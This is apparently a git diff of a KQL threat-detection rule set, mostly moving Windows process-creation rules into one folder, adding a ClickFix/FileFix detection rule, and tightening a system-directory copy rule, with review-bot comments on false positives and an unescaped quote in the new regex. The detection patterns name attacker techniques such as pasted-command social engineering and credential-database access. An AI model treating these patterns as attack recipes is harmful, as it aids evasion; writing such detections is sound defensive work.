diff --git a/KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_dacl_abuse_to_hide_services_via_sc_exe.kql diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/service_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql rename to KQL/rules/windows/process_creation/service_registry_key_deleted_via_reg_exe.kql diff --git a/KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_security_descriptor_tampering_via_sc_exe.kql diff --git a/KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql b/KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/service_started_stopped_via_wmic_exe.kql 
diff --git a/KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql similarity index 100% rename from KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql rename to KQL/rules/windows/process_creation/service_startuptype_change_via_powershell_set_service.kql diff --git a/KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql b/KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql similarity index 100% rename from KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql rename to KQL/rules/windows/process_creation/service_startuptype_change_via_sc_exe.kql diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql rename to KQL/rules/windows/process_creation/set_suspicious_files_as_system_files_using_attrib_exe.kql diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql similarity index 100% rename from KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql rename to KQL/rules/windows/process_creation/setup16_exe_execution_with_custom_lst_file.kql diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql similarity index 100% rename from KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql rename to KQL/rules/windows/process_creation/shadow_copies_creation_using_operating_systems_utilities.kql 
diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql similarity index 100% rename from KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql rename to KQL/rules/windows/process_creation/shadow_copies_deletion_using_operating_systems_utilities.kql diff --git a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql similarity index 100% rename from KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql rename to KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql rename to KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql diff --git a/KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql similarity index 100% rename from KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql rename to KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql diff --git a/KQL/rules/Persistence/shimcache_flush.kql b/KQL/rules/windows/process_creation/shimcache_flush.kql similarity index 100% rename from KQL/rules/Persistence/shimcache_flush.kql rename to KQL/rules/windows/process_creation/shimcache_flush.kql 
diff --git a/KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql similarity index 100% rename from KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql rename to KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql similarity index 100% rename from KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql rename to KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql similarity index 100% rename from KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql rename to KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql similarity index 100% rename from KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql rename to KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql diff --git a/KQL/rules/Execution/start_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql similarity index 100% rename from KQL/rules/Execution/start_windows_service_via_net_exe.kql rename to KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql 
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql rename to KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_net_exe.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql diff --git a/KQL/rules/Impact/stop_windows_service_via_sc_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql similarity index 100% rename from KQL/rules/Impact/stop_windows_service_via_sc_exe.kql rename to KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspect_svchost_activity.kql rename to KQL/rules/windows/process_creation/suspect_svchost_activity.kql 
diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql rename to KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql rename to KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql rename to KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql rename to KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql 
diff --git a/KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql similarity index 100% rename from KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql rename to KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql rename to KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql rename to KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_calculator_usage.kql rename to KQL/rules/windows/process_creation/suspicious_calculator_usage.kql diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql rename to KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql diff --git a/KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql 
diff --git a/KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql rename to KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql diff --git a/KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql rename to KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql diff --git a/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql new file mode 100644 index 00000000..16d162b2 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql 
@@ -0,0 +1,13 @@
+// Title: Suspicious ClickFix/FileFix Execution Pattern
+// Author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
+// Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001, attack.t1204.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") and (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql
rename to KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
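Review bot: The `| where` clause fires on any child of explorer.exe whose command line carries a `#` plus one of several very generic words ("account", "human", "identity", "confirmation", "validation"), so the `// - Unlikely` false-positive entry looks optimistic: a browser or other GUI application launched from Explorer with a URL or argument containing a `#` fragment and one of those words would plausibly match too. The `#` is doing most of the work — it appears to anchor on the comment-style decoy text attackers append to the pasted command — and that rationale is not written down anywhere in the rule. I would replace the false-positive line with `// - GUI applications (e.g. browsers) started from Explorer whose arguments contain a "#" fragment and one of the generic keywords` and add a comment above the `| where`, `// The "#" anchors on the comment-style decoy appended to the pasted command (e.g. "# I am not a robot")`. If the rule is meant to stay this broad, tuning on the child FolderPath (script hosts and LOLBins) is the obvious lever, but that is a coverage decision for the maintainer.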
diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql rename to KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql diff --git a/KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_control_panel_dll_load.kql rename to KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql similarity index 69% rename from KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql rename to KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql index 03e79ea8..bca8698f 100644 --- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql +++ b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql 
@@ -12,4 +12,4 @@ // - When the command contains the keywords but not in the correct order DeviceProcessEvents -| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS") and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe"))) \ No newline at end of file +| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ProcessCommandLine matches regex "(?i)\\s['"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)" and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and 
FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql rename to KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_curl_exe_download.kql rename to KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql rename to KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql diff --git a/KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql rename to KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql rename to KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql 
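Review bot: The new `matches regex` literal on the `+| where` line contains a bare double quote inside `['"]?`, and as rendered here that quote would terminate the KQL string literal and leave `]?C:\\\\Windows...` outside it; unless a backslash was lost in rendering, it should be escaped, `matches regex "(?i)\\s['\"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)"`. The regex also narrows coverage relative to the old `contains "\\System32"` / `"\\SysWOW64"` / `"\\WinSxS"` checks: it requires a literal `C:\Windows\` prefix, so copies addressed via `%SystemRoot%` or `%windir%`, a non-C system drive, or an admin share such as `\\host\C$\Windows\System32` no longer match, and the leading `\s` skips any path not preceded by whitespace. If that trade-off is deliberate (the old form presumably over-matched on any `\System32` substring), it deserves a one-line comment above the query stating what is now out of scope, e.g. `// Anchored to C:\Windows\ to cut noise; %SystemRoot%/UNC forms are intentionally not covered`. The rewritten `| where` is the last line of the file, so the rule header and the earlier false-positive entries are outside this hunk.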
diff --git a/KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_diantz_alternate_data_stream_execution.kql rename to KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql rename to KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql diff --git a/KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_dll_loaded_via_certoc_exe.kql rename to KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql diff --git a/KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql rename to KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_from_direct_ip_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_from_file_sharing_website_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_download_from_office_domain.kql rename to KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql diff --git a/KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_download_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_driver_dll_installation_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql rename to KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_dumpminitool_execution.kql rename to KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql diff --git a/KQL/rules/Execution/suspicious_electron_application_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql similarity index 100% rename from KQL/rules/Execution/suspicious_electron_application_child_processes.kql rename to KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql diff --git a/KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql similarity index 100% rename from KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql rename to KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql diff --git a/KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql similarity index 100% rename from KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql rename to KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql rename to KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql 
diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
diff --git a/KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
similarity index 100%
rename from KQL/rules/Discovery/suspicious_execution_of_hostname.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_execution_of_installutil_without_log.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
diff --git a/KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
similarity index 100%
rename from KQL/rules/Impact/suspicious_execution_of_shutdown.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
diff --git a/KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
similarity index 100%
rename from KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
similarity index 100%
rename from KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
rename to KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
diff --git a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
similarity index 50%
rename from KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
rename to KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
index 58552aa1..367eadf6 100644
--- a/KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
